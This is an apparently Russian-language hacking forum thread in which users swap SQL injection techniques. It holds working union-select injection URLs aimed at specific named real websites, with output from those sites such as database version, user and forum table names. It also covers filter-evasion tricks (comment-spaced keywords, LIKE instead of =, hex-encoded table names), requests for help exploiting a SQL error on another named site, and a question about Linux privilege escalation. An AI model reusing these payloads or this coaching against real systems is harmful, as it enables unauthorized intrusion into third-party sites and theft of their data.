за ошибку я знаю-опечаска да вот когда пытаюсь сделать этот запрос-выдает ошибку-и это не первый сайт приведи пример например на этом сайте
захекси user from+information_schema.columns+where+table_name=0x75736572 (в твоем случае 0x666F72756D735F61757468) ошибка из-за экранирования кавычек
ага понял... там блин = фильтруется надо like пользовать Code: http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,column_name,6,7,8,9,10/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'forums_auth'/**/limit/**/1,1/*
samarin Это часный случай хитрых хохлов,а вообще переводи либо в Hex либо в char вот ссылка _http://snak3.h17.ru/tools/ Scipio спасибо
очень похоже на бинарный мд5 PHP: string md5 (string str [, bool raw_output]) если дать второй параметр, то получится что-то типа твоего
Не похоже. Бинарный md5 всегда содержит одинаковое количество символов, равное шестнадцати. А тут, как видишь, оно все время разное.
Все кто может просветите вот в таком вопросе. Есть сайт http://www.rusk.ru/search.php?action=news Если в форму "поиск" ввести какую-нибудь ерунду, а на в конце поставить "кавычку", то вылетает ошибка: SQL ERROR..... N1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sdfd'') > 0))GROUP BY article.idar ORDER BY article.insdate DESC' at line 1 Интересует в обще-то следующее. Это на самом деле SQL? Можно ли из этого что-то "выжать"? А самое главное каков будет рабочий запрос? Ну то есть что надо ввести в поле формы или в УРЛ адрес, чтобы пробить инфу о базе и т.д? Правильно ли я понял, что запрос должен быть не совсем стандартный с использованием скобок? (в тексте описания ошибки они вроде как присутствуют, а где-то читал, что скобки должны быть закрыты в запросе). Спасибо за возможный ответ.
Ух, спасибо, всегда приятно общаться с умным человеком, а то я уж всю голову сломал куда и чего вписать. Оно ж получается, что вся инфа-то в описании ошибки была, тока надо правильно ей пользоваться. Ещё раз мерси.
Вчера уже обсуждалась тема по поводу information_schema.columns cегодня та же проблема, только у меня не получилось ни чар ни лайк, может что-то неправильно делал-объясните пожалуйста! --------------------------------------------------------- http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,concat_ws(0x3a,version(),user(),database()),3/* 5.0.32-Debian_7etch1-log:[email protected]:firstline_base TRIGGERS 2103_forum_auth_access 2103_forum_banlist 2103_forum_categories 2103_forum_config 2103_forum_confirm 2103_forum_disallow 2103_forum_forum_prune 2103_forum_forums 2103_forum_groups 2103_forum_posts 2103_forum_privmsgs 2103_forum_privmsgs_text 2103_forum_ranks 2103_forum_sessions_keys 2103_forum_user_group 2103_forum_users
не впревый раз натыкаюсь на такое http://louisianaforward.com/view-release.aspx?id=3502' собственно подскажите что енто такое и можно ли его использовать ?
samarin на этом сайте всё работает _http://www.svetotehnika.dn.ua/templates/svet/index.php?id=181&show=news&newid=-8459+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0x323130335f666f72756d5f63617465676f72696573+limit+1,1/*
Добрый ночи хотел узнать у спецов в области Unix-Like можно ли в данной ОС Linux 2.6.9-1.667 поднять права? Реально ли вообще?
